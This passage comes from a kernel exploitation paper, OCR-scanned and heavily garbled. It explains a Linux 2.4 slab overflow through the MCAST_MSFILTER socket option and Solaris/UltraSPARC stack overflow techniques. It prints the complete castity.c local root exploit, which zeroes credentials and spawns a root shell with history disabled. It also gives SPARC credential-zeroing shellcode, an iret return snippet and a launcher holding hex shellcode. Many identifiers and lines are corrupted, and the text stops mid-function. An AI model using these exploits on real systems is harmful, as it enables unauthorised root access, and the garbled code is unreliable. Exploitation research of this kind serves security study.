< linux-2.4.24/ipc/shm.c > 


struct shmid_kernel /* private to the kernel */ 


{ 


struct kern_ipc_perm shm_perm; 
struct file * shm_file; 
int id; 


[acs] 
}; 


Pees] 


asmlinkage long sys_shmget (key_t key, size_t size, int shmflg) 
{ 

struct shmid_kernel *shp; 

int err, id = 0; 


down (&shm_ids.sem) ; 
if (key == IPC_PRIVATE) { 
rr = newseg(key, shmflg, size); 


-] 


static int newseg (key_t key, int shmflg, size_t size) 


-] 


shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), GFP_USI 


El 

ve) 
Lo 
~ 


-] 


As you see, struct shmid_kernel is 64 bytes long and gets allocated using 
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kmalloc (size-64) generic cache [ we can alloc as many as we want (up to 
fill the slab) using subsequent ’shmget’ calls ]. 

Inside it there is a struct file pointer, that we could make point, thanks 
to the overflow, to the userland, where we will emulate all the necessary 
structs to reach a function pointer dereference (that’s exactly what the 
exploit does). 


Now it is time to force the msize value into being > 32 and =< 64, to make 
it being alloc’ed inside the same (size-64) generic cache. 

'Good’ values for gsf->gf_numsrce range from 0x40000005 to 0x4000000c. 

That raises another problem : since we’re able to write 4 bytes for 

every __kernel_sockaddr_storage present in the gsf struct we need a pretty 
large one to reach the ’shm_file’ pointer, and so we need to pass a large 
‘optlen’ value. 
The 0x40000005 —- 0x4000000c range, thou, makes the GROUP_FILTER_SIZE() macro 
used at [4] evaluate to a positive and small value, which isn’t large 

enough to reach the ’shm_file’ pointer. 


We solved that problem thanks to the fact that, once an object is free’d, 
its ‘memory contents’ are not zero’ed (or cleaned in any way). 

Since the copy_from_user at [3] happens _before_ the check at [4], we were 
able to create a sequence of 1024-sized objects by repeatedly issuing a 
failing (at [4]) ’setsockopt’, thus obtaining a large-enough one. 


Hoping to make it clearer let’s sum up the steps 


-— fill the 1024 slabs so that at next allocation a fresh one is returned 

- alloc the first object of the new 1024-slab. 

- use as many ‘failing’ setsockopt as needed to copy values inside 
objects 2 and 3 [and 4, if needed, not the usual case thou] 

-— free the first object 

- use a smaller (but still 1024-slab allocation driving) value for 
optlen that would pass the check at [4] 


At that point the gsf pointer points to the first object inside our 
freshly created slab. Objects 2 and 3 haven’t been re-used yet, so still 
contains our data. Since the objects inside the slab are adiacent we have 
a de-facto larger (and large enough) gsf struct to reach the ’shm_file’ 
pointer. 


Last note, to reliably fill the slabs we check /proc/slabinfo. 

The exploit, called castity.c, was written when the advisory went out, and 
is only for 2.4.* kernels (the sys_epoll vulnerability [12] was more than 
enough for 2.6.* ones ;) ) 


Exploit follows, just without the initial header, since the approach has 
been already extensively explained above. 


< stuff/expl/linux/castity.c > 


nclude <sys/types.h> 
nclude <sys/stat.h> 
nclude <sys/shm.h> 
nclude <sys/socket.h> 
nclude <sys/resource.h> 
nclude <sys/wait.h> 
nclude <stdio.h> 
nclude <stdlib.h> 
nclude <fcntl.h> 
nclude <signal.h> 
nclude <errno.h> 


Pepe pe pe pe pe pe pe pe pe 


define __u32 unsigned int 

define MCAST_MSFILTER 48 

define SOL_IF 0 

define SIZ 4096 

define R_FILE "/etc/passwd" // Set it to whatever file you 
can read. It’s just for 1024 filling. 


U 


Gl 
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struct in_addr { 
unsigned int s_addr; 
}; 
#define SOCK_SIZE 16 
struct sockaddr_in { 
unsigned short sin_family; /* Address 


unsigned short int 
struct in_addr 


sin_port; 


sin_addr; /* Internet 


/* Pad to size of ‘struct sockaddr’. */ 
unsigned char pad[__SOCK_SIZE — sizeo 
sizeof (unsigned short int) 
in_addr) ]; 
}; 
struct group_filter 
{ 
_u32 gf_interface; L® 
struct sockaddr_storage gf_group; /* 
32 gf_fmode; /* 
__u32 gf_numsrc; fe 
struct sockaddr_storage gf_slist[1]; ag 


}; 


family 


/* Port number 


address 


f(short int) - 
— sizeof (struct 


interface index */ 
multicast address */ 
filter mode */ 
number of sources */ 
interface index */ 


struct damn_inode { 
void *a, *b; 
void eG, * az 
void Wey. Riiee 
void Mite SACs 
unsigned long size[40]; // Yes, somewhere here :-) 
} le; 
struct dentry_suck { 
unsigned int count, flags; 
void *inode; 
void *dd; 
} fucking = { Oxbad, Oxbad, &le, NULL }; 
struct fops_rox { 
void Kai,» *by -*.6,. *Ap -RE,. SE, AGF 
void *mmap; 
void *h, ate Meby *m, *n, *O, *p, *Q, Ly 
void *get_unmapped_area; 
} chien; 
struct file_fuck { 
void *prev, *next; 
void *dentry; 
void *mnt; 
void *fop; 
} gagne = { NULL, NULL, &fucking, NULL, &chien }; 
static char stack [16384]; 
int gotsig 0, 
fillup_1024 = 0, 
fillup_64 = 0, 
uid, gid; 
int *pid, *shmid; 
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static void sigusr(int b) 
{ 

gotsig = 1; 
} 


void fatal (char *str) 

{ 
fprintf(stderr, "[-] %s\n", str); 
exit (EXIT_FAILURE) ; 


} 


#define BUFSIZE 256 


int calculate_slaboff (char *name) 


{ 


FILE *fp; 

char slab[BUFSIZE], line[BUFSIZE]; 
int ret; 

/* UP case */ 


int active_obj, total; 


bzero(slab, BUFSIZI 
bzero(line, BUFSIZI 


fp = fopen("/proc/slabinfo", "r"); 
if ( fp == NULL ) 
fatal("error opening /proc for slabinfo"); 


fgets(slab, sizeof(slab) - 1, fp); 
do { 
ret = 0; 
if ('!fgets(line, sizeof(line) - 1, fp)) 
break; 
ret = sscanf(line, "%Ss Su Su", Slab, &active_obj, &total); 


} while (strcemp(slab, name)); 


close (fileno(fp)); 
fclose(fp); 


return ret == 3 ? total - active_obj : -1; 
} 
int populate_1024 slab() 
int fd[252]; 

int i; 


signal (SIGUSR1, sigusr); 


wA~ 


for ‘( = O72 4 <- 252 op at+ 
fd[i] = open(R_FILE, O_RDONLY); 
while (!gotsig) 
pause(); 
gotsig = 0; 


POL io He SOs: a OSD A) 
close(fd[il); 


int kernel_code () 


{ 
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Inte Av 
__asm__("movl Ssesp, SO" "rnc: 5 
c &= Oxffffe000; 
v = (void *) c; 
for (i = 0; i < 4096 / sizeof(*v) -— 1; itt) { 
if (v[i] == uid && v[itl] == uid) { 
i++; v[it+] = 0; v[it+] = 0; v[it+] = 0; 
} 
if (v[i] == gid) { 
v[it+] = 0; v[it+] = 0; v[itt+] = 0; vf[itt] = 0; 
return -1; 
} 
} 
return -1; 
} 
void prepare_evil_file () 
{ 
int i = 0; 
chien.mmap = &kernel_code ; // just to pass do_mmap_pgoff check 
chien.get_unmapped_area = &kernel_code; 
/* 
* First time i run the exploit i was using a precise offset for 
* size, and i calculated it _wrong_. Since then my lazyness took 
* over and i use that ""very clean"" *g* approach. 
* Why i’m telling you ? It’s 3 a.m., i don’t find any better than 
* writing blubbish comments 
ey. 
for (i = 0; i < 40; itt) 
le.size[i] = SIZE; 
} 
#define SEQ MULTIPLIER 32768 
void prepare_evil_gf ( struct group_filter *gf, int id ) 
{ 
int filling_space = 64 - 4 * sizeof(int); 
int i = 0; 
struct sockaddr_in “aSin' 


filling_space /= 4; 


for (i= 0; i < filling_space; i++ ) 
{ 
sin = (struct sockaddr_in *) &égf 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = 0x414141 
} 
/* Emulation of struct kern_ipc_perm 


(struct sockaddr_in *) &égf->gf_s 
AF_INET; 


IPC_PRIVAT! 


sin 
sin->sin_family 
sin->sin_addr.s_addr 


GJ 


->gf_slist[i]; 


41; 


e/ 


list [i++]; 
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Sin = (struct sockaddr_in *) &gf->gf_slist [i++]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = uid; 


sin = (struct sockaddr_in *) &gf->gf_slist [itt]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = gid; 


sin = (struct sockaddr_in *) &gf->gf_slist [itt]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = uid; 


sin = (struct sockaddr_in *)&gf->gf_slist [itt]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = gid; 


sin = (struct sockaddr_in *) &égf->gf_slist [itt]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = -1; 


sin = (struct sockaddr_in *) &égf->gf_slist [itt]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = id/SEQ_MULTIPLIER; 


/* evil struct file address */ 


sin = (struct sockaddr_in *)&gf->gf_slist [itt]; 
sin->sin_family = AF_INET; 
sin->sin_addr.s_addr = (unsigned long) &égagne; 


/* that will stop mcast loop */ 


sin = (struct sockaddr_in *) &égf->gf_slist [itt]; 
sin->sin_family = Oxbad; 
sin->sin_addr.s_addr = Oxdeadbeef; 
return; 
} 
void cleanup () 
{ 
int i = 0; 
struct shmid_ds Ss; 


for (i= 0; i < fillup_1024; i++ ) 

{ 
kill (pid[i], SIGUSR1); 
waitpid(pid[i], NULL, __WCLONI 


GJ 
~~ 
~ 


for (i= 0; i < fillup_64 - 2; i++ ) 
shmctl(shmid[i], IPC_RMID, &s); 


define EVIL_GAP 4 

define SLAB 1024 "size-1024" 
define SLAB 64 "size-64" 
#define OVF 21 

define CHUNKS 1024 

define LOOP_VAL O0x4000000F 
define CHIEN_VAL 0x4000000b 
main () 


int sockfd, ret, i; 
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unsigned int true_alloc_size, last_alloc_chunk, loops; 
char *buffer; 
struct group_filter * OL; 
struct shmid_ds Ss; 
char *argv[] = { "le-chien", NULL }; 
char *envp[] = { "TERM=linux", "PS1l=le-chien\\$", 


"BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", 
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", 
"HISTFILE=/dev/null", NULL }; 


true_alloc_size = sizeof(struct group_filter) - sizeof(struct 


sockaddr_storage) + sizeof(struct sockaddr_storage) * OVF; 


sockfd = socket (AF_INET, SOCK_STREAM, 0); 


uid = getuid(); 
gid = getgid(); 


gf = malloc (true_alloc_size); 
iP Uogh SS NULL.) 
fatal ("Malloc failure\n"); 


gf->gf_interface = 0; 
gf->gf_group.ss_family = AF_INET; 


fillup_64 = calculate_slaboff(SLAB_64); 


if ( fillup_64 == -1 ) 
fatal("Error calculating slab fillup\n"); 


printf("({+] Slab $s fillup is %d\n", SLAB 64, fillup_64); 


/* Yes, two would be enough, but we have that "sexy" #define, 
don’t use it ? :-) */ 
fillup_64 += EVIL_GAP; 


entries 


shmid = malloc(fillup_64 * sizeof(int)); 
if ( shmid == NULL ) 
fatal("Malloc failure\n"); 


why 


/* Filling up the size-64 and obtaining a new page with EVIL_GAP 


ay 


for (i= 0; i < fillup_64; itt ) 


shmid[i] = shmget (IPC_PRIVATE, 4096, IPC_CREAT|SHM_R); 


prepare_evil_file(); 
prepare_evil_gf(gf, shmid[fillup_64 - 1]); 


buffer = (char *)gf; 


fillup_1024 = calculate_slaboff(SLAB_1024); 
if ( fillup_1024 == -1 ) 
fatal("Error calculating slab fillup\n"); 


printf("[+] Slab %s fillup is Sd\n", SLAB 1024, fillup_1024); 


fillup_1024 += EVIL_GAP; 


pid = malloc(fillup_1024 * sizeof(int)); 
if (pid == NULL ) 
fatal ("Malloc failure\n"); 


for (“i- = 07 4. < frllup 1024) i++) 
Bet nea 


lone (populate_1024 slab, stack + sizeof(stack) - 
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4, 0, NULL); 


printf("[+] Attempting to trash size-1024 slab\n"); 
/* Here starts the loop trashing size-1024 slab */ 


last_alloc_chunk = true_alloc_size % CHUNKS; 
loops = true_alloc_size / CHUNKS; 


gf->gf_numsrce = LOOP_VAL; 


printf("[+] Last size-1024 chunk is of size %d\n", 
last_alloc_chunk) ; 
printf("[+] Looping for $d chunks\n", loops); 


kill (pid[--fillup_1024], SIGUSR1); 
waitpid(pid[fillup_1024], NULL, __WCLON 


Gl 


i 


if ( last_alloc_chunk > 512  ) 
ret = setsockopt (sockfd, SOL_IP, MCAST_MSFILTER, buffer + 
loops * CHUNKS, last_alloc_chunk) ; 
else 


/* 
* Should never happen. If it happens it probably means that we’ve 

* bigger datatypes (or slab-size), so probably 

* there’s something more to "fix me". The while loop below is 


* already okay for the eventual fixing ;) 
* / 
fatal("Last alloc chunk fix me\n"); 
while ( loops > 1 ) 


{ 
kill (pid[-—-fillup_1024], SIGUSR1); 
waitpid(pid[fillup_1024], NULL, __WCLON 


Gl 


i 


ret = setsockopt (sockfd, SOL_IP, MCAST_MSFILTER, buffer + 
—-loops * CHUNKS, CHUNKS); 
} 


/* Let’s the real fun begin */ 


gf->gf_numsrce = CHIEN_VAL; 


kill (pid[--fillup_1024], SIGUSR1) ; 
waitpid(pid[fillup_1024], NULL, __WCLON 


Gl 


i 


shmctl(shmid[fillup_64 - 2], IPC_RMID, &s); 
setsockopt (sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS); 


cleanup (); 


ret = (unsigned long) shmat (shmid[fillup_64 - 1], NULL, 
SHM_RDONLY) ; 


printf("Le Fucking Chien GAGNE!!!!!!!\n"); 
setresuid(0, 0, 0); 

setresgid(0, 0, 0); 

execve ("/bin/sh", argv, envp); 

exit (0); 


} 


printf("Here we are, something sucked :/ (if not Ll_cache too big, 
probably slab align, retry)\n" ); 
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tee [ 2.3 - Stack overflow vulnerabilities 


When a process is in ’kernel mode’ it has a stack which is different from 
the stack it uses at userland. We’ll call it ’kernel stack’. 

That kernel stack is usually limited in size to a couple of pages (on 
Linux, for example, it is 2 pages, 8kb, but an option at compile time 
exist to have it limited at one page) and is not a surprise that a common 
design practice in kernel code developing is to use locally to a function 
as little stack space as possible. 


At a first glance, we can imagine two different scenarios that could go 
under the name of ’stack overflow vulnerabilities’ 


—- 'standard’ stack overflow vulnerability : a write past a buffer on the 
stack overwrites the saved instruction pointer or the frame pointer 
(Solaris only, Linux is compiled with -fomit-frame-pointer) or some 
variable (usually a pointer) also located in the stack. 


—- '’stack size overflow’ : a deeply nested callgraph goes further the 
alloc’ed stack space. 


Stack based explotation is more architectural and o.s. specific than the 
already presented slab based one. 

That is due to the fact that once the stack is trashed we achiev 
execution flow hijack, but then we must find a way to somehow return to 
userland. We con’t cover here the details of x86 architecture, since those 
have been already very well explained by noir in his phrack60 paper [13]. 


We will instead focus on the UltraSPARC architecture and on its more 
common operating system, Solaris. The next subsection will describe the 
relevant details of it and will present a technique which is suitable 
aswell for the exploiting of slab based overflow (or, more generally, 
whatever ‘controlled flow redirection’ vulnerability). 


The AMD64 architecture won’t be covered yet, since it will be our ’example 
architecture’ for the next kind of vulnerabilities (race condition). The 
sendmsg [5] exploit proposed later on is, at the end, a stack based one. 


Just before going on with the UltraSPARC section we’ll just spend a couple 
of words describing the return-to-ring3 needs on an x86 architecture and 
the Linux use of the kernel stack (since it quite differs from the Solaris 
one). 


Linux packs together the stack and the struct associated to every process 
in the system (on Linux 2.4 it was directly the task_struct, on Linux 2.6 
it is the thread_info one, which is way smaller and keeps inside a pointer 
to the task_struct). This memory area is, by default, 8 Kb (a kernel 
option exist to have it limited to 4 Kb), that is the size of two pages, 
which are allocated consecutively and with the first one aligned to a 2%13 
multiple. The address of the thread_struct (or of the task_struct) is thus 
calculable at runtime by masking out the 13 least significant bits of the 
Kernel Stack (%esp). 


The stack starts at the bottom of this page and ’grows’ towards the top, 
where the thread_info (or the task_struct) is located. To prevent the 
‘second’ type of overflow when the 4 Kb Kernel Stack is selected at 
compile time, the kernel uses two adjunctive per-CPU stacks, one for 
interrupt handling and one for softirq and tasklets functions, both one 
page sized. 


It is obviously on the stack that Linux stores all the information to 
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return from exceptions, interrupts or function calls and, logically, to 
get back to ring3, for example by means of the iret instruction. 

If we want to use the ’iret’ instruction inside our shellcodes to get out 
cleanly from kernel land we have to prepare a fake stack frame as it 
expects to find. 


We have to supply: 


- a valid user space stack pointer 
—- a valid user space instruction pointer 
—- a valid EFLAGS saved EFLAGS register 
- a valid User Code Segment 
- a valid User Stack Segment 
LOWER ADDRESS 
User SS iF 
User ESP 
EFLAGS Fake Iret Frame 
User CS 
User EIP < current kernel stack pointer (ESP) 


We’ve added a demonstrative stack based exploit (for the Linux dummy 
driver) which implements a shellcode doing that recovery-approach 


movl SO0x7b, 0x10 (%esp) // user stack segment (SS) 
movl Sstack_chunk,0xc(%esp) // user stack pointer (ESP) 
movl $0x246, 0x8 (Sesp) // valid EFLAGS saved register 
movl $0x73,0x4 (%esp) // user code segment (CS) 
movl Scode_chunk,0x0(%esp) // user code pointer (EIP) 
iret 

You can find it in < expl/linux/stack_based.c > 


---[ 2.3.1 - UltraSPARC exploiting 


The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit [2] 
architecture. The most ’interesting’ part of it from an exploiting 
perspective is the support it gives to the operating system for a fully 
separated address space among userspace and kernelspace. 


This is achieved through the use of context registers and address space 
identifiers /’/ASI’. The UltraSPARC MMU provides two settable context 
registers, the primary (PContext) and the secondary (SContext) one. One 
more context register hardwired to zero is provided, which is the nucleus 
context (’context’ 0 is where the kernel lives). 

To every process address space is associated a ’context value’, which is 
set inside the PContext register during process execution. This value is 
used to perform memory addresses translation. 


Every time a process issues a trap instruction to access kernel land (for 
example ta 0x8 or ta 0x40, which is how system call are implemented on 
Solaris 10), the nucleus context is set as default. The process context 
value (as recorded inside PContext) is then moved to SContext, while the 
nucleus context becomes the /primary context’. 


At that point the kernel code can access directly the userland by 
specifying the correct ASI to a load or store alternate instruction 
(instructions that support a direct asi immediate specified lda/sta). 
Address Space Identifiers (ASIs) basically specify how those instruction 
have to behave 


< usr/src/uts/sparc/v9/sys/asi.h > 
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define ASI_N 0x04 /* nucleus */ 

define ASI_NL 0x0C /* nucleus little */ 

define ASI_AIUP 0x10 /* as if user primary */ 

define ASI_AIUS 0x11 /* as if user secondary */ 

define ASI_AIUPL 0x18 /* as if user primary little */ 
define AST_AIUSL 0x19 /* as if user secondary little */ 


-] 


define ASI_US 


ea 
w 


ASTI_ATIUS 
</> 


Theese are ASI that are specified by the SPARC v9 reference (more ASI are 
machine dependant and let modify, for example, MMU or other hardware 
registers, check usr/src/uts/sun4u/sys/machasi.h), the ’little’ version is 
just used to specify a byte ordering access different from the ’standard’ 
big endian one (SPARC v9 can access data in both formats). 


The ASI_USER is the one used to access, from kernel land, the user space. 
An instruction like 


ldxa [addr]ASI_USER, 411 
would just load the double word stored at ’addr’, relative to the address 


space contex stored in the SContext register, ’as if’ it was accessed by 
userland code (so with all protection checks). 


It is thus possible, if able to start executing a minimal stub of code, to 
copy bytes from the userland wherever we want at kernel land. 


But how do w xecute code at first ? Or, to make it even more clearer, 
where do we return once we have performed our (slab/stack) overflow and 
hijacked the instruction pointer ? 


To complicate things a little more, the UltraSPARC architecture implements 
the execution bit permission over TTEs (Translation Table Entry, which are 
the TLB entries used to perform virtual/physical translations). 


It is time to give a look at Solaris Kernel implementation to find a 
solution. The technique we’re going to present now (as you’ll quickly 
figure out) is not limited to stack based exploiting, but can be used 
every time you’re able to redirect to an arbitrary address the instruction 
flow at kernel land. 


---] 2.3.2 - A reliable Solaris/UltraSPARC exploit 


The Solaris process model is slightly different from the Linux one. The 
foundamental unit of scheduling is the ’kernel thread’ (described by the 
kthread_t structure), so one has to be associated to every existing LWP 
(light-weight process) in a process. 

LWPs are just kernel objects which represent the ’kernel state’ of every 
‘user thread’ inside a process and thus let each on nter the kernel 
indipendently (without LWPs, user thread would contend at system call). 


The information relative to a /’/running process’ are so scattered among 
different structures. Let’s s what we can make out of them. 

Every Operating System (and Solaris doesn’t differ) has a way to quickly 
get the /’/current running process’. On Solaris it is the ’current kernel 
thread’ and it’s obtained, on UltraSPARC, by 


#define curthread (threadp () ) 
< usr/src/uts/sparc/ml/sparc.il > 


! return current thread pointer 
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-inline threadp, 0 
.register %g7, #scratch 
mov Sg7, %00 

.end 


a 


It is thus stored inside the %g7 global register. 

From the kthread_t struct we can access all the other ’process related’ 
structs. Since our main purpose is to raise privileges we’re interested in 
where the Solaris kernel stores process credentials. 


Those are saved inside the cred_t structure pointed to by the proc_t one 


fF mdb —-k 
Loading modules: [ unix krtld genunix ip usba nfs random ptm ] 
> ::ps ! grep snmpdx 


R 278 1 278 278 0 0x00010008 0000030000e67488 snmpdx 
> 0000030000e€67488::print proc_t 
{ 


p_exec = 0x30000e5b5a8 
p_as = 0x300008bae48 
p_lockp = 0x300006167c0 
p_crlock = { 
_opaque = [ 0 ] 
} 
p_cred = 0x3000026df28 
Senet] 
0x3000026df28::print cred_t 


Vv 


cr_ref = 0x67b 
Crue 
cr_gid = 0 
cr_ruid = 
cr_rgid = 
cr_suid 
cr_sgid = 
cr_ngroups = 0 

cr_groups = [ 0 J 


ll 
fo) 


} 

> ::offsetof proc_t p_cred 
offsetof (proc_t, p_cred) = 0x20 
> r:quit 


The ’::ps’ dcmd ouput introduces a very interesting feature of the Solaris 
Operating System, which is a god-send for exploiting. 

The address of the proc_t structure in kernel land is exported to 
userland 


bash-2.05$ ps -aef -o addr,comm | grep snmpdx 
30000e67488 /usr/lib/snmp/snmpdx 
bash-2.05$ 


At a first glance that could seem of not great help, since, as we said, 
the kthread_t struct keeps a pointer to the related proc_t one 


> ::offsetof kthread_t t_procp 


offsetof (kthread_t, t_procp) = 0x118 
> ::ps ! grep snmpdx 
R 278 1 278 278 0 0x00010008 0000030000e67488 snmpdx 


> 0000030000e€67488::print proc_t p_tlist 
p_tlist = 0x30000e52800 

> 0x30000e52800::print kthread_t t_procp 
t_procp = 0x30000e67488 

> 
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To understand more precisely why the exported address is so important we 
have to take a deeper look at the proc_t structure. 

This structure contains the user_t struct, which keeps information like 
the program name, its argc/argv value, etc 


> 0000030000eC67488::print proc_t p_user 
eee 


p_user.u_ticks = 0x95c 

p_user.u_comm = [ "snmpdx" ] 

p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" ] 
p_user.u_arge = 0x4 


p_user.u_argv = Oxffbffcfc 

p_user.u_envp = Oxffbffd10 

p_user.u_cdir 0x3000063fd40 
asdinees| 


We can control many of those. 

Even more important, the pages that contains the process_cache (and thus 
the user_t struct), are not marked no-exec, so we can execute from there 
(for example the kernel stack, allocated from the seg_kp [kernel pageabl 
memory] segment, is not executable). 


Let’s see how ’u_psargs’ is declared 


< usr/src/common/sys/user.h > 

define PSARGSZ 80 /* Space for exec arguments (used by 
ps(1)) */ 

define MAXCOMLEN 16 /* <= MAXNAMLEN, >= sizeof (ac_comm) */ 


-] 


typedef struct user { 
/* 


* These fields are initialized at process creation time and never 


* modified. They can be accessed without acquiring locks. 
af 
struct execsw *u_execsw; /* pointer to exec switch entry */ 
auxv_t wu_auxv KERN_NAUXV_IMPL]; /* aux vector from exec */ 
timestruc_t u_start; /* hrestime at process start */ 
clock_t u_ticks; /* lbolt at process start */ 
char u_comm[MAXCOMLEN + 1]; /* executable file name from exec 
ey. 
char u_psargs [PSARGSZ]; /* arguments from exec */ 
int u_argc; /* value of argc passed to main() 
uff. 
uintptr_t u_argv; /* value of argv passed to main () 
af 
uintptr_t u_envp; /* value of envp passed to main () 
aif 
[reeset | 
a a 


The idea is simple : we put our shellcode on the command line of our 
exploit (without ’zeros’) and we calculate from the exported proc_t 
address the exact return address. 

This is enough to exploit all those situations where we have control of 
the execution flow _without_ trashing the stack (function pointer 
overwriting, slab overflow, etc). 


We have to remember to take care of the alignment, thou, since the 
UltraSPARC fetch unit raises an exception if the address it reads the 
instruction from is not aligned on a 4 bytes boundary (which is the size 
of every sparc instruction) 


> ::o0ffsetof proc_t p_user 
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offsetof (proc_t, p_user) = 0x330 

> ::offsetof user_t u_psargs 
offsetof (user_t, u_psargs) = 0x1l61 
> 


Since the proc_t taken from the ’process cache’ is always aligned to an 8 
byte boundary, we have to jump 3 bytes after the starting of the u_psargs 


char array (which is where we’1ll put our shellcode). 
That means that we have space for 76 / 4 = 19 instructions, which is 
usually enough for average shellcodes.. but space is not really a limit 


since we can /’chain’ more psargs struct from different processes, simply 
jumping from each others. Moreover we could write a two stage shellcode 
that would just start copying over our larger one from the userland using 
the load from alternate space instructions presented befor 


We’re now facing a slightly more complex scenario, thou, which is the 
‘kernel stack overflow’. We assume here that you’re somehow familiar with 
userland stack based exploiting (if you’re not you can check [15] and 
[16]). 
The main problem here is that we have to find a way to safely return to 
userland once trashed the stack (and so, to reach the instruction pointer, 
the frame pointer). A good way to understand how the ’kernel stack’ is 
used to return to userland is to follow the path of a system call. 

You can get a quite good primer here [17], but we think that a read 
through opensolaris sources is way better (you’1ll see also, following the 
sys_trap entry in uts/sun4u/ml/mach_locore.s, the code setting the nucleus 
context as the PContext register). 


Let’s focus on the ’kernel stack’ usage 
< usr/src/uts/sun4u/ml/mach_locore.s > 


ALTENTRY (user_trap) 


user trap 


make all windows clean for kernel 


buy a window using the current thread’s stack 
sethi $hi(nwin_minus_one), %g5 
ld [sg5 + Slo(nwin_minus_one)], %g5 
wrpr $g0, %g5, scleanwin 
CPU_ADDR(%g5, %g6) 
ldn [g5 + CPU_THREAD], %g5 
ldn [sg5 + T_STACK], %g6 
sub 3g6, STACK_BIAS, %g6 
save sg6, 0, Ssp 


< / > 


In %g5 is saved the number of windows that are ’implemented’ in the 
architecture minus one, which is, in that case, 8 - 1= 7. 

CLEANWIN is set to that value since there are no windows in use out of the 
current one, and so the kernel has 7 free windows to use. 


The cpu_t struct addr is then saved in %g5 (by CPU_ADDR) and, from there, 


the thread pointer [ cpu_t->cpu_thread ] is obtained. 
From the kthread_t struct is obtained the ’kernel stack address’ [the 
member name is called t_stk]. This one is a good news, since that member 


is easy accessible from within a shellcode (it’s just a matter of 
correctly accessing the %g7 / thread pointer). From now on we can follow 
the sys_trap path and we’1ll be able to figure out what we will find on the 
stack just after the kthread_t->t_stk value and where. 


To that value is then subtracted ’STACK_BIAS’ : the 64-bit v9 SPARC ABI 
specifies that the %fp and %sp register are offset by a constant, the 
stack bias, which is 2047 bits. This is one thing that we’ve to remember 
while writing our ’stack fixup’ shellcode. 
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of this constant is 0. 


he save below is another good news, 


because that means that we can use 
to return 


he t_stk value as a fp 


(along with the ’right return address’ ) 


t ’some val 


id point’ 


inside the syscall path 


here and cleanily get back to userspace). 


The question now is 
return address or we can somehow gather it ? 


at which point ? Do we have to ‘’hardcode’ 


(and thus let it flow from 


that 


A further look at the syscall path reveals that 
ENTRY_NP (ut10) 
SAVE_GLOBALS (%17) 
SAVE_OUTS (%17) 
mov %16, THREAD REG 
wrpr $g0, PSTATE_KERN, %pstate !' enable ints 
jmp] $13, %O7 ! call trap handler 
mov S17, %00 
And, that %13 is 


have_win: 


SYS1 


TRAP_TRACE(%0l1, %02, %03) 


at this point we have a new window we can play in, 
and %g6 is the label we want done to bounce to 


save needed current globals 


mov gl, %13 ! pe 
mov $g2, Sol ! arg #1 
mov $gG3, %02 ! arg #2 
srlx $93, 32, %03 ! pseudo arg #3 
srlx $92, 32, %04 ! pseudo arg #4 
sgl was preserved since 
#define SYSCALL (which) \ 
TT_TRACE (trace_gen) i\ 
set (which), %g1 :\ 
ba, pt Sxcc, sys_trap 7 \ 
sub sg0, 1, %g4 i\ 
-align 32 


and so it is syscall_trap for LP64 syscall and 


syscall_trap32 for ILP32 


syscall. Let’s check if the stack layout is the one w xpect to find 
> ::ps ! grep snmp 
R 291 1 291 291 0 0x00020008 0000030000db4060 snmpXdmid 
R 278 1 278 278 0 0x00010008 0000030000d2f488 snmpdx 
> ::ps ! grep snmpdx 
R 278 1 278 278 0 0x00010008 0000030000d2f488 snmpdx 
> 0000030000d2f488::print proc_t p_tlist 
p_tlist = 0x30001dd4800 
> 0x30001dd4800::print kthread_t t_stk 
t_stk = 0x2al100497af0O "" 
> 0x2al00497af0,16/K 
0x2al00497af0: 1007374 2a100497ba0 30001dd2048 1038a3c 
1449e10 0 30001dd4800 
2a100497ba0 ffbff£700 3 3a980 
0 3a980 0 
ffbff6a0 ££1525f0 0 0 
0 0 0 
0 


> syscall_trap32=xX 
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1038a3c 
> 


Analyzing the ’stack frame’ we see that the saved %16 is exactly 
THREAD _REG (the thread value, 30001dd4800) and %13 is 1038a3c, the 
syscall_trap32 address. 


At that point we’re ready to write our ’shellcode’ 
# cat sparc_stack_fixup64.s 


-globl begin 


-globl end 

begin: 
ldx [%g7+0x118], %10 
ldx [%10+0x20], %11 
st %g0, S11 + 4] 
ldx [%g7+8], %fp 
ldx [%fp+0x18], %i7 


sub Sfp,2047,%fp 
add Oxa8, %i7, %i7 


ret 
restore 
end: 
# 
At that point it should be quite readable : it gets the t_procp address 


from the kthread_t struct and from there it gets the p_cred addr. 

It then sets to zero (the %g0 register is hardwired to zero) the cr_uid 
member of the cred_t struct and uses the kthread_t->t_stk value to set 
Sfp. Sfp is then dereferenced to get the ’syscall_trap32’ address and the 
STACK_BIAS subtraction is then performed. 


The add O0xa8 is the only hardcoded value, and it’s the ’return place’ 
inside syscall_trap32. You can quickly derive it from a ::findstack dcmd 
with mdb. A more advanced shellcode could avoid this /’/hardcoded value’ by 
opcode scanning from the start of the syscall_trap32 function and looking 
for the jmpl %Sreg,%o7/nop sequence (syscall_trap32 doesn’t get a new 
window, and stays in the one sys_trap had created) pattern. 
On all the boxes we tested it was always 0xa8, that’s why we just left it 
hardcoded. 


As we said, we need the shellcode to be into the command line, ’shifted’ 
of 3 bytes to obtain the correct alignment. To achieve that a simple 
launcher code was used 


bash-2.05$ cat launcer_stack.c 
include <unistd.h> 


char sc[] = "\x66\x66\x66" // padding for alignment 
"\xe0\x59\xel\x18\xe2\x5c\x20\x20\xc0\x24\x60\x04\xfc\x59\xe0" 
"\x08\xfe\x5£\xa0\x18\xbc\x27\xa7\xff\xbe\x07\xe0\xa8\x81" 
"\xc7\xe0\x08\x81\xe8\x00\x00"; 


int main () 

{ 
execl("e", sc, NULL); 
return 0; 

} 

bash-2.05$ 


The shellcode is the one presented befor 


Before showing the exploit code, let’s just paste the vulnerable code, 
from the dummy driver provided for Solaris 
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< stuff/drivers/solaris/test.c > 


[esos] 


static int handle_stack (intptr_t arg) 


{ 
char buf [32]; 
